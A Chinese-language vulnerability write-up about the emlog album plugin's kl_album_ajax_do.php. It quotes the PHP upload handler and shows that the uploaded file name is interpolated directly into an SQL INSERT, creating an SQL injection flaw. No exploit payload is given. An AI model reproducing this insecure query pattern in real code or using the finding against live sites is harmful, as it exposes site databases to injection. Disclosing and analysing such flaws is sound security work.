emlog相册插件 kl_album_ajax_do.php SQL注入漏洞

来自[http://www.leavesongs.com/PENETRATION/emlog-important-plugin-getshell.html] 检查EM相册插件源代码，看到kl_album_ajax_do.php： ``` <?php /** * kl_album_ajax_do.php * design by KLLER */ require_once('../../../init.php'); $DB = MySql::getInstance(); $kl_album_config = unserialize(Option::get('kl_album_config')); if(isset($_POST['album']) && isset($_FILES['Filedata'])){ if(function_exists('ini_get')){ $kl_album_memory_limit = ini_get('memory_limit'); $kl_album_memory_limit = substr($kl_album_memory_limit, 0, strlen($kl_album_memory_limit)-1); $kl_album_memory_limit = ($kl_album_memory_limit+20).'M'; ini_set('memory_limit', $kl_album_memory_limit); } define('KL_UPLOADFILE_MAXSIZE', kl_album_get_upload_max_filesize()); define('KL_UPLOADFILE_PATH', '../../../content/plugins/kl_album/upload/'); define('KL_IMG_ATT_MAX_W', 100);//图片附件缩略图最大宽 define('KL_IMG_ATT_MAX_H', 100);//图片附件缩略图最大高 $att_type = array('jpg', 'jpeg', 'png', 'gif');//允许上传的文件类型 $album = isset($_POST['album']) ? intval($_POST['album']) : ''; if($_FILES['Filedata']['error'] != 4){ $upfname = kl_album_upload_file($_FILES['Filedata']['name'], $_FILES['Filedata']['error'], $_FILES['Filedata']['tmp_name'], $_FILES['Filedata']['size'], $_FILES['Filedata']['type'], $att_type); $photo_size = chImageSize(EMLOG_ROOT.substr($upfname, 2), KL_IMG_ATT_MAX_W, KL_IMG_ATT_MAX_H); $result = $DB->query("INSERT INTO ".DB_PREFIX."kl_album(truename, filename, description, album, addtime, w, h) VALUES('{$_FILES['Filedata']['name']}', '{$upfname}', '".date('Y-m-d', time())."', {$album}, ".time().", {$photo_size['w']}, {$photo_size['h']})"); if($result){ $new_id = $DB->insert_id(); $the_option_value = Option::get('kl_album_'.$album); if($the_option_value !== null){ $the_option_value = trim($new_id.','.$the_option_value, ','); Option::updateOption('kl_album_'.$album, $the_option_value); $CACHE->updateCache('options'); } } } exit; } if(ROLE != 'admin') exit('access deined!'); if(isset($_GET['action']) && $_GET['action']!=''){... ``` 可以发现上传的if语句中有如下代码： ``` $result = $DB->query("INSERT INTO ".DB_PREFIX."kl_album(truename, filename, description, album, addtime, w, h) VALUES('{$_FILES['Filedata']['name']}', '{$upfname}', '".date('Y-m-d', time())."', {$album}, ".time().", {$photo_size['w']}, {$photo_size['h']})"); ``` 将$_FILES['Filedata']['name']直接插入数据库。这里造成了一个SQL注入漏洞。